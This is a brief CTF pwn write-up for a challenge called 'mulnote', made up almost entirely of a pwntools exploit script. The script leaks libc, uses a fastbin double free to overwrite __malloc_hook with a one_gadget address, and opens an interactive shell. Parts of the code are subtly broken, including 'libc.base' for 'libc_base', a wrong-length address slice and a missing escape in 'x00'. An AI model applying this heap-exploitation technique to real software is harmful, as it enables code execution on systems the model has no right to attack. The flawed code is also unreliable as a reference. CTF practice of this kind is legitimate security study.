byte ctf (pwn)

mulnote

简单的组合攻击

from pwn import *
context.log_level = 'debug'

sh = process('./mulnote')
elf = ELF('mulnote')
lib = ELF('./libc.so')

def	choice(achar):
        	sh.sendlineafter('>',achar)

def	add(size,con):
        	sh.sendline('C')
        	sh.sendlineafter('>',str(size))
        	sh.sendlineafter('>',con)

def	show():
        	sh.sendline('S')

def	free(idx):
        	sh.sendline('R')
        	sh.sendlineafter('>',str(idx))

def	edit(idx,con):
        	sh.sendline('E')
        	sh.sendlineafter('>',str(idx))
        	sh.sendlineafter('>',con)

########################leak libc#####################
add(0x100,'0')
add(0x20,'1')
free(0)
add(0x100,'A')
show()
libc = u64(sh.recvuntil('\x7f')[-4:].ljust(8,"\x00"))
log.success("libc = %s"%hex(libc))
libc_base = libc - 0x3c
log.success("libc_base = %s"%hex(libc_base))
malloc_hook = libc_base + lib.symbols['__malloc_hook']
one = libc.base + 0x45216
######################################
add(0x60,'3')
add(0x60,'4')
free(3)
free(4)
free(3)

add(0x60,p64(malloc_hook-0x23)) #5
add(0x60,'6')
add(0x60,'7')
add(0x60,'x00'*0x13+p64(one)) #8
sh.sendlineafter('>','C')
sh.sendlineafter('size>',1)

sh.interactive()